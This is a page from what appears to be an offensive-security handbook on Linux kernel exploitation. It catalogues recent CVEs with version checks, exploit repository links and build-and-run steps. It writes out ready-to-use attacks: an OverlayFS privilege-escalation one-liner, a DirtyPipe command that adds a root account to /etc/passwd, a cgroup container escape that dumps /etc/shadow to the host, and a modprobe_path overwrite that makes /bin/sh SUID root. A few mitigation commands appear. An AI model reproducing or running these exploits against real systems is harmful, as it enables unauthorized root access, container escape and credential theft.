Linux Kernel Exploits

Modern Linux kernel vulnerabilities and exploitation techniques.

Skill Level: Advanced Prerequisites: C programming, Linux internals, memory corruption basics

Kernel Exploit Landscape

Quick Version Check

# Get kernel version
uname -r
cat /proc/version

# Check for known vulnerabilities
# https://github.com/lucyoa/kernel-exploits
# https://github.com/briskets/linux-exploit-suggester

Recent Critical CVEs

CVE-2024-1086 (nf_tables Use-After-Free)

# Affects: Linux kernel < 6.8
# Type: Use-after-free in netfilter nf_tables
# Impact: Local privilege escalation

# Check if vulnerable
cat /proc/version  # < 6.8
lsmod | grep nf_tables

# Exploit: https://github.com/Notselwyn/CVE-2024-1086
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit

# Expected: Root shell

CVE-2023-32233 (nf_tables Batch Request UAF)

# Affects: Linux kernel 5.1 to 6.3.1
# Type: Use-after-free in nf_tables
# Impact: Local privilege escalation

# Check version
uname -r

# Requires: CAP_NET_ADMIN in user namespace
# Or unprivileged user namespaces enabled
cat /proc/sys/kernel/unprivileged_userns_clone

# Exploit: https://github.com/Liuk3r/CVE-2023-32233

CVE-2023-2640 & CVE-2023-32629 (GameOver(lay))

# Affects: Ubuntu kernels with OverlayFS
# Type: Privilege escalation via OverlayFS
# Impact: Local root

# Check if vulnerable (Ubuntu specific)
cat /etc/os-release
uname -r

# Simple check
unshare -rm sh -c "mkdir l u w m && cp /u*/teleif l/teleif && setcap cap_setuid+eip l/teleif && mount -t overlay overlay -o lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/teleif

# Exploit: https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629

CVE-2023-0386 (OverlayFS Privilege Escalation)

# Affects: Linux kernel < 6.2
# Type: OverlayFS capability bypass
# Impact: Local privilege escalation

# Check
uname -r  # < 6.2

# Requires overlayfs and user namespaces
cat /proc/filesystems | grep overlay

# Exploit: https://github.com/sxlmnwb/CVE-2023-0386

CVE-2022-0847 (DirtyPipe)

# Affects: Linux kernel 5.8 to 5.16.11, 5.15.25, 5.10.102
# Type: Pipe buffer flag overwrite
# Impact: Arbitrary file write, privilege escalation

# Check version
uname -r

# Compile exploit
# https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
gcc -o exploit exploit.c
./exploit /etc/passwd 1 $'toor:$1$salt$hash:0:0:root:/root:/bin/bash\n'

# Then: su toor

CVE-2022-2588 (route4 UAF)

# Affects: Linux kernel < 5.19
# Type: Use-after-free in route4 classifier
# Impact: Local privilege escalation

# Requires: CONFIG_NET_CLS_ROUTE4=y
cat /boot/config-$(uname -r) | grep CONFIG_NET_CLS_ROUTE4

# Exploit: https://github.com/Markakd/CVE-2022-2588

io_uring Vulnerabilities

Overview

io_uring is async I/O interface (kernel 5.1+)
Complex attack surface - many vulnerabilities discovered
Often requires: kernel 5.1+, io_uring enabled

CVE-2024-0582 (io_uring PBUF UAF)

# Affects: Linux 6.4 to 6.7
# Type: Use-after-free in provided buffers

# Check io_uring availability
cat /proc/filesystems | grep io_uring
ls /dev/io_uring* 2>/dev/null

CVE-2023-2598 (io_uring UAF)

# Affects: Linux kernel 5.7 to 6.3
# Type: Use-after-free

# Exploit approach varies by kernel version
# Check specific PoCs for your kernel

Disable io_uring (Mitigation)

# Check if disabled
sysctl kernel.io_uring_disabled

# Disable (requires root)
sysctl -w kernel.io_uring_disabled=2

# Or in /etc/sysctl.conf
kernel.io_uring_disabled = 2

eBPF Exploits

Attack Surface

eBPF (extended Berkeley Packet Filter):
- Runs in kernel context
- Verifier supposed to ensure safety
- Verifier bugs = kernel code execution

CVE-2023-2163 (eBPF Verifier Bypass)

# Affects: Various kernel versions
# Type: Verifier bounds tracking error
# Impact: Arbitrary kernel read/write

# Check eBPF availability
ls /sys/fs/bpf/
bpftool prog list 2>/dev/null

# Unprivileged BPF (if enabled)
cat /proc/sys/kernel/unprivileged_bpf_disabled
# 0 = unprivileged users can use BPF

Mitigation

# Disable unprivileged BPF
sysctl -w kernel.unprivileged_bpf_disabled=1

# Lockdown BPF
echo 2 > /proc/sys/kernel/unprivileged_bpf_disabled

Container Escape Exploits

CVE-2024-21626 (runc Container Escape)

# Affects: runc < 1.1.12
# Type: File descriptor leak
# Impact: Container escape

# Check runc version
runc --version
docker info | grep -i runc

# Exploit involves:
# 1. Leaking /proc/self/fd/X from runc
# 2. Using leaked fd to access host filesystem

CVE-2022-0492 (cgroup Escape)

# Affects: Linux kernel < 5.17
# Type: cgroup v1 release_agent escape
# Impact: Container escape (if cgroup mounted)

# Inside container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/exploit.sh" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit.sh
echo "cat /etc/shadow > $host_path/shadow" >> /exploit.sh
chmod +x /exploit.sh
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Exploitation Techniques

Heap Exploitation

// Modern kernel heap (SLUB) exploitation

// 1. Spray technique
// Allocate many objects to control heap layout
for (int i = 0; i < 1000; i++) {
    spray_objects[i] = allocate_kernel_object();
}

// 2. Cross-cache attack
// Exhaust slab, force allocation from different cache
// Allows type confusion between objects

// 3. msg_msg spray
// Use msgsnd() to spray controlled data
struct msgbuf {
    long mtype;
    char mtext[SIZE];
};
msgsnd(qid, &msg, SIZE, 0);

ROP in Kernel

// Kernel ROP gadgets
// Find with: ROPgadget --binary vmlinux

// Typical chain:
// 1. Disable SMEP/SMAP (if possible)
// 2. Call commit_creds(prepare_kernel_cred(0))
// 3. Return to userspace

// prepare_kernel_cred and commit_creds addresses
// /proc/kallsyms (if kptr_restrict=0)
cat /proc/kallsyms | grep -E "prepare_kernel_cred|commit_creds"

ret2usr (If No SMEP/SMAP)

// Direct jump to userspace code from kernel
// Blocked by SMEP (code) and SMAP (data)

// Check protections
cat /proc/cpuinfo | grep -E "smep|smap"

// If neither present:
void escalate() {
    commit_creds(prepare_kernel_cred(0));
}
// Overwrite function pointer to point to escalate()

Modprobe Path Overwrite

// Overwrite modprobe_path to execute arbitrary binary
// When unknown binary format executed, kernel runs modprobe

// 1. Find modprobe_path address
cat /proc/kallsyms | grep modprobe_path

// 2. Overwrite with path to your script
// modprobe_path = "/tmp/pwn"

// 3. Create /tmp/pwn script
echo '#!/bin/sh' > /tmp/pwn
echo 'chmod 4755 /bin/sh' >> /tmp/pwn
chmod +x /tmp/pwn

// 4. Trigger by executing invalid binary
echo -e '\xff\xff\xff\xff' > /tmp/invalid
chmod +x /tmp/invalid
/tmp/invalid

// 5. Now /bin/sh is SUID root
/bin/sh -p

Kernel Protection Bypass

KASLR Bypass

# Kernel Address Space Layout Randomization
# Leaks needed to find kernel addresses

# Common leak sources:
# - /proc/kallsyms (if kptr_restrict=0)
# - dmesg (if dmesg_restrict=0)
# - Kernel info leaks via side channels
# - eBPF verifier leaks

# Check restrictions
cat /proc/sys/kernel/kptr_restrict
cat /proc/sys/kernel/dmesg_restrict

SMEP/SMAP Bypass

// SMEP: Can't execute userspace code from kernel
// SMAP: Can't access userspace data from kernel

// Bypass via ROP:
// 1. Flip CR4 bits to disable SMEP/SMAP
// native_write_cr4 gadget

// Or use kernel-only ROP chain
// Stay entirely in kernel space

Tools

# Linux Exploit Suggester
https://github.com/mzet-/linux-exploit-suggester
./linux-exploit-suggester.sh

# Linux Exploit Suggester 2
https://github.com/jondonas/linux-exploit-suggester-2
perl linux-exploit-suggester-2.pl

# PEDA/GEF/pwndbg for kernel debugging
# https://github.com/pwndbg/pwndbg

# Kernel exploit development
https://github.com/xairy/kernel-exploits

Quick Reference

CVE

Kernel Versions

Type

CVE-2024-1086

< 6.8

nf_tables UAF

CVE-2023-32233

5.1-6.3.1

nf_tables UAF

CVE-2023-2640

Ubuntu specific

OverlayFS

CVE-2023-0386

< 6.2

OverlayFS

CVE-2022-0847

5.8-5.16.11

DirtyPipe

CVE-2022-2588

< 5.19

route4 UAF

Linux Post-Exploitation - Linux privesc
Privilege Escalation - Overview
Docker & Kubernetes - Container escapes

PreviousWeb Exploits & C2 NextModern C2 Frameworks

Last updated 8 days ago

Was this helpful?

hashtagKernel Exploit Landscape

hashtagQuick Version Check

hashtagRecent Critical CVEs

hashtagCVE-2024-1086 (nf_tables Use-After-Free)

hashtagCVE-2023-32233 (nf_tables Batch Request UAF)

hashtagCVE-2023-2640 & CVE-2023-32629 (GameOver(lay))

hashtagCVE-2023-0386 (OverlayFS Privilege Escalation)

hashtagCVE-2022-0847 (DirtyPipe)

hashtagCVE-2022-2588 (route4 UAF)

hashtagio_uring Vulnerabilities

hashtagOverview

hashtagCVE-2024-0582 (io_uring PBUF UAF)

hashtagCVE-2023-2598 (io_uring UAF)

hashtagDisable io_uring (Mitigation)

hashtageBPF Exploits

hashtagAttack Surface

hashtagCVE-2023-2163 (eBPF Verifier Bypass)

hashtagMitigation

hashtagContainer Escape Exploits

hashtagCVE-2024-21626 (runc Container Escape)

hashtagCVE-2022-0492 (cgroup Escape)

hashtagExploitation Techniques

hashtagHeap Exploitation

hashtagROP in Kernel

hashtagret2usr (If No SMEP/SMAP)

hashtagModprobe Path Overwrite

hashtagKernel Protection Bypass

hashtagKASLR Bypass

hashtagSMEP/SMAP Bypass

hashtagTools

hashtagQuick Reference

hashtagRelated Topics